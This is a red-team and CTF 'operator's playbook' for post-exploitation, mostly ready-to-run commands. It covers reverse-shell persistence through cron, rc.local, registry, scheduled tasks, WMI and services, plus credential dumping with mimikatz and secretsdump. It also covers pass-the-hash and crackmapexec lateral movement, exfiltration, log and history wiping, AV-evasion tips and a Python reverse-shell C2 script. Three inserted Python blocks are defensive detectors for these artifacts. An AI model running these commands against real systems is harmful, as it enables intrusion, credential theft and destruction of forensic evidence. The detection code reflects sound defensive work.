Persistence & Lateral Movement

Post-Exploitation: Persistence & Lateral Movement — The Operator’s Playbook


Once you’ve escalated to root or SYSTEM, the game shifts from “getting in” to staying in, expanding access, and owning the environment. Post-exploitation is where reconnaissance becomes control — persistence, data theft, privilege expansion, and stealth are your weapons.

This section focuses on real-world operator methodology for maintaining and extending access during CTFs, red team operations, and advanced labs.


I. 🧩 Core Concepts

Concept               Description
Persistence           Methods to maintain access after reboot or logout.
Lateral Movement      Expanding from one system/user to another.
Privilege Retention   Ensuring continuous elevated access.
Data Exfiltration     Extracting sensitive information (flags, creds, loot).
Covering Tracks       Evading detection and cleaning artifacts.


II. 🔒 Persistence Techniques

Persistence is about surviving resets and reboots — staying invisible yet present.


🧠 1. Linux Persistence

🔹 Add a Cron Job

echo "@reboot bash -i >& /dev/tcp/10.10.14.2/4444 0>&1" >> /etc/crontab

🔹 Modify rc.local

echo "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1 &" >> /etc/rc.local
chmod +x /etc/rc.local

🔹 SSH Key Injection

mkdir -p ~/.ssh
echo "your_public_key_here" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

🔹 Backdoor with SUID Shell

cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash

Then later:

/tmp/rootbash -p
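
From the defender's side, the three Linux techniques above each leave a simple artifact: a reverse-shell line in cron or rc.local, an extra key in authorized_keys, and a setuid copy of a shell in a writable directory. The Python audit below is an added example, not code from the original page; it works on constructed sample text and a throwaway directory, and the pattern list and approved-key baseline are assumptions you would adapt to your own hosts.

```python
import os
import re
import tempfile

# Reverse-shell idioms seen in the cron and rc.local entries above.
REVSHELL_PATTERNS = [
    re.compile(r"/dev/tcp/[\d.]+/\d+"),                    # bash network redirection
    re.compile(r"\bnc\b.*\s-e\s"),                          # netcat -e
    re.compile(r"python3?\s+-c\s+['\"]import\s+socket"),    # python socket one-liner
]

def scan_startup_text(source, text):
    """Return (source, line_no, line) for non-comment lines matching a reverse-shell idiom."""
    return [(source, n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if not line.lstrip().startswith("#") and any(p.search(line) for p in REVSHELL_PATTERNS)]

def unapproved_keys(authorized_keys_text, approved):
    """Return authorized_keys lines whose (type, key) pair is missing from the approved baseline.
    Lines with a leading options field (command=..., from=...) are not parsed by this simple split."""
    bad = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and not parts[0].startswith("#") and (parts[0], parts[1]) not in approved:
            bad.append(line.strip())
    return bad

def find_setuid_files(root):
    """Walk root and return regular files with the setuid bit set (a copied /tmp/rootbash)."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.isfile(path) and os.lstat(path).st_mode & 0o4000:
                found.append(path)
    return sorted(found)

SAMPLE_CRONTAB = """# /etc/crontab (constructed sample)
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root bash -i >& /dev/tcp/10.10.14.2/4444 0>&1
"""
SAMPLE_KEYS = "ssh-ed25519 AAAAC3known admin@laptop\nssh-rsa AAAAB3unknown unknown\n"  # constructed
APPROVED = {("ssh-ed25519", "AAAAC3known")}

def demo_setuid_scan():
    """Build a throwaway dir with one setuid and one normal file; return setuid basenames found."""
    d = tempfile.mkdtemp()
    for name, mode in (("rootbash", 0o4755), ("notes.txt", 0o644)):
        open(os.path.join(d, name), "w").close()
        os.chmod(os.path.join(d, name), mode)
    return [os.path.basename(p) for p in find_setuid_files(d)]
```

On a real host you would feed scan_startup_text the contents of /etc/crontab, /etc/cron.d/* and /etc/rc.local, and point find_setuid_files at /tmp, /dev/shm and /var/tmp rather than the whole filesystem.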

🧩 2. Windows Persistence

🔹 Registry Autorun

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\payload.exe" /f

🔹 Scheduled Task

schtasks /create /sc onlogon /tn "Backdoor" /tr "powershell.exe -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.2/p.ps1')"

🔹 Service Creation

sc create Backdoor binpath= "C:\rev.exe" start= auto
net start Backdoor

🔹 WMI Event Subscription (Stealth)

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="filt",EventNamespace="root\cimv2",QueryLanguage="WQL",Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="cons",CommandLineTemplate="powershell.exe -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.2/p.ps1')"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name='filt'",Consumer="CommandLineEventConsumer.Name='cons'"

III. 🧠 Credential Extraction & Token Abuse

Post-exploitation means turning secrets into new access.

🧩 Linux

cat /etc/shadow
grep -r "password" /home 2>/dev/null
strings /var/log/auth.log

Dump SSH keys:

find /home -name "id_rsa" 2>/dev/null

🧩 Windows

Dump credentials from memory (with SYSTEM):

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Dump SAM/SECURITY/NTDS:

reg save HKLM\SAM sam
reg save HKLM\SYSTEM system

Use secretsdump.py:

secretsdump.py -sam sam -system system LOCAL

Token impersonation:

PrintSpoofer64.exe -i -c cmd.exe

IV. 🚀 Lateral Movement Techniques

Once persistence is stable, expand laterally. Goal: move to other systems or accounts, harvesting domain-wide access.


🧩 1. Credential Reuse

Use dumped hashes or passwords to connect to other systems.

ssh [email protected]
evil-winrm -i 10.10.10.11 -u user -p pass

🧩 2. Pass-the-Hash (Windows)

psexec.py DOMAIN/[email protected] -hashes <LM:NT>

🧩 3. Pass-the-Ticket (Kerberos)

Dump tickets:

mimikatz.exe
sekurlsa::tickets

Use:

kerberos::ptt <ticket.kirbi>

🧩 4. SSH Key Propagation (Linux)

for host in $(cat hosts.txt); do
    ssh-copy-id user@$host
done

🧩 5. SMB/WinRM Propagation (Windows)

crackmapexec smb 10.10.10.0/24 -u admin -p password
crackmapexec winrm 10.10.10.0/24 -u admin -p password --exec "whoami"
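
The credential reuse, pass-the-hash and crackmapexec sweeps above share one footprint on the target side: a single account completing network logons (Security event 4624, logon type 3) to many hosts from one source address within seconds. The detector below is an added example, not part of the original page; it runs over constructed 4624-style records, and the field names, five-host threshold and two-minute window are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, host, account, src_ip, auth="NTLM", logon_type=3):
    """One simplified Security 4624 (successful logon) record as a SIEM might export it."""
    return {"ts": ts, "target_host": host, "account": account, "src_ip": src_ip,
            "auth": auth, "logon_type": logon_type}

EVENTS = [  # constructed sample, not real log data
    ev("2024-05-01T10:00:01", "FS01", "admin", "10.10.10.50"),
    ev("2024-05-01T10:00:02", "FS02", "admin", "10.10.10.50"),
    ev("2024-05-01T10:00:04", "WEB01", "admin", "10.10.10.50"),
    ev("2024-05-01T10:00:05", "DC01", "admin", "10.10.10.50"),
    ev("2024-05-01T10:00:09", "APP01", "admin", "10.10.10.50"),
    ev("2024-05-01T09:12:00", "FS01", "jsmith", "10.10.10.77", auth="Kerberos"),
    ev("2024-05-01T10:00:07", "WS07", "jsmith", "10.10.10.77", auth="Kerberos", logon_type=2),
    ev("2024-05-01T11:40:00", "WEB01", "jsmith", "10.10.10.77", auth="Kerberos"),
]

def detect_fanout(events, min_hosts=5, window_seconds=120):
    """Return {(src_ip, account): {"hosts": [...], "ntlm": bool}} for every account that
    completes network logons (type 3) to at least min_hosts distinct hosts from one source
    inside any window_seconds-long window. Interactive logons (type 2) are ignored."""
    window = timedelta(seconds=window_seconds)
    by_key = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3:
            key = (e["src_ip"], e["account"].lower())
            by_key[key].append((datetime.fromisoformat(e["ts"]), e["target_host"], e["auth"]))
    alerts = {}
    for key, rows in by_key.items():
        rows.sort()
        for t0, _, _ in rows:  # slide the window start over each logon time
            inside = [(h, a) for t, h, a in rows if t0 <= t <= t0 + window]
            hosts = {h for h, _ in inside}
            if len(hosts) >= min_hosts:
                alerts[key] = {"hosts": sorted(hosts), "ntlm": any(a == "NTLM" for _, a in inside)}
                break
    return alerts
```

The "ntlm" flag is worth surfacing separately: NTLM network logons from a workstation that normally authenticates with Kerberos are the usual pass-the-hash tell, even when the fan-out count stays low.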

V. 🧰 Data Exfiltration

Your end goal in CTFs: get flags, credentials, or loot.

🧠 Simple Exfil

tar czf loot.tar.gz /root/.ssh /var/www/html/*.php
python3 -m http.server 8080

Download:

wget http://<attacker_ip>:8080/loot.tar.gz

💣 Stealthy Windows Exfil

Compress-Archive -Path C:\Users\Admin\Documents -DestinationPath C:\temp.zip
certutil -urlcache -split -f "http://10.10.14.2/upload.zip" C:\temp.zip

VI. 🧹 Covering Tracks

Once you have persistence and loot, clean your footprints.

🧩 Linux

history -c
rm -rf /tmp/*
find / -name ".bash_history" -exec rm {} \; 2>/dev/null

🧩 Windows

del /F /Q C:\Windows\Temp\*
wevtutil cl Security
wevtutil cl System
Remove-Item -Path $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
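
The Windows persistence commands in section II (reg add, schtasks, sc create, the WMI subscription), the LSASS dump in section III and the wevtutil log clearing above all produce well-known event IDs when auditing and Sysmon are on. The triage routine below is an added example, not code from the original page: it maps those IDs to labels over constructed sample records, keeps the noisy Sysmon registry and process-access events focused on Run keys and lsass.exe, and raises one alert when a host shows the complete WMI filter, consumer and binding chain. Field names are simplified assumptions, not an exact SIEM schema.

```python
from collections import defaultdict

RULES = {  # well-known Windows Security/System and Sysmon event IDs
    ("Security", 4698): "Scheduled task created (schtasks)",
    ("System", 7045): "Service installed (sc create)",
    ("Security", 1102): "Security log cleared (wevtutil cl)",
    ("Sysmon", 13): "Run-key value written (reg add)",
    ("Sysmon", 10): "Process access to lsass.exe (credential dumping check)",
    ("Sysmon", 19): "WMI EventFilter created",
    ("Sysmon", 20): "WMI EventConsumer created",
    ("Sysmon", 21): "WMI FilterToConsumer binding created",
}
WMI_CHAIN = ("WMI EventFilter", "WMI EventConsumer", "WMI FilterToConsumer")

def classify(event):
    """Label one event, or None. Sysmon 13/10 are noisy, so they only count for Run keys / lsass."""
    label = RULES.get((event["channel"], event["event_id"]))
    data = event.get("data", {})
    if label and event["channel"] == "Sysmon" and event["event_id"] == 13:
        return label if "\\CurrentVersion\\Run\\" in data.get("TargetObject", "") else None
    if label and event["channel"] == "Sysmon" and event["event_id"] == 10:
        return label if data.get("TargetImage", "").lower().endswith("\\lsass.exe") else None
    return label

def triage(events):
    """Group labels per host; add a synthetic alert when the full filter->consumer->binding chain appears."""
    per_host = defaultdict(list)
    for event in events:
        label = classify(event)
        if label:
            per_host[event["host"]].append(label)
    for labels in per_host.values():
        if all(any(l.startswith(prefix) for l in labels) for prefix in WMI_CHAIN):
            labels.append("WMI persistence chain complete")
    return dict(per_host)

def ev(host, channel, event_id, **data):
    return {"host": host, "channel": channel, "event_id": event_id, "data": data}

EVENTS = [  # constructed sample records, not from a real host
    ev("WS01", "Sysmon", 13, TargetObject=r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Backdoor"),
    ev("WS01", "Security", 4698, TaskName=r"\Backdoor"),
    ev("WS01", "Sysmon", 19, Name="filt", EventNamespace=r"root\cimv2"),
    ev("WS01", "Sysmon", 20, Name="cons", Type="Command Line"),
    ev("WS01", "Sysmon", 21, Consumer="CommandLineEventConsumer.Name='cons'", Filter="__EventFilter.Name='filt'"),
    ev("WS01", "Security", 1102),
    ev("WS02", "Sysmon", 13, TargetObject=r"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Domain"),
    ev("WS02", "Sysmon", 10, TargetImage=r"C:\Windows\system32\lsass.exe", GrantedAccess="0x1010"),
]
```

Event 1102 cannot be suppressed by clearing the log, because it is written as the first record of the fresh log, so a forwarded 1102 is the reliable signal that wevtutil cl ran.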

VII. 🧠 Real-World Operator Workflow

# Step 1: PrivEsc achieved
whoami

# Step 2: Persistence
(cron / reg add / schtasks)

# Step 3: Cred extraction
mimikatz / /etc/shadow

# Step 4: Lateral movement
crackmapexec smb 10.10.10.0/24 -u user -p password

# Step 5: Exfiltration
tar czf /tmp/loot.tar.gz /home/*flag*
python3 -m http.server 8000

VIII. 🧩 Tools & Frameworks

Tool                       Purpose
Metasploit (post modules)  Automated post-exploitation
Empire                     PowerShell-based C2 & persistence
CrackMapExec               SMB/WinRM movement & credential spraying
Mimikatz / LaZagne         Credential dumping
SharpHound (BloodHound)    Lateral movement graphing
LinPEAS / WinPEAS          Enumeration for persistence
Chisel / SSH / Socat       Pivoting & tunneling


IX. 🧠 Pro Tips & Red Team Tricks

Persistence Safety

  • Always duplicate your access method (cron + SSH key, or schtasks + service).

  • Rotate ports and encode payloads to bypass AV.

Lateral Movement Logic

  • Prioritize systems with administrative sessions (net sessions).

  • Enumerate users and trust relationships:

    net view /domain
    net group "Domain Admins" /domain

Data Discipline

  • Store loot in organized folders:

    /loot/
    ├── creds.txt
    ├── shadow_dumps/
    ├── screenshots/
    └── flags/
  • Compress before exfil to reduce signatures.

Operational Security

  • Always clean shell history before disengagement.

  • Randomize filenames, ports, and service names.

  • Encrypt communication channels when possible.


X. ⚔️ Bonus: Persistence + C2 Template (Linux)

#!/bin/bash
# Minimal C2 Persistence
if ! pgrep -f revshell.py > /dev/null; then
    nohup python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.2",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")' &
fi
(crontab -l; echo "@reboot /tmp/revshell.py") | crontab -
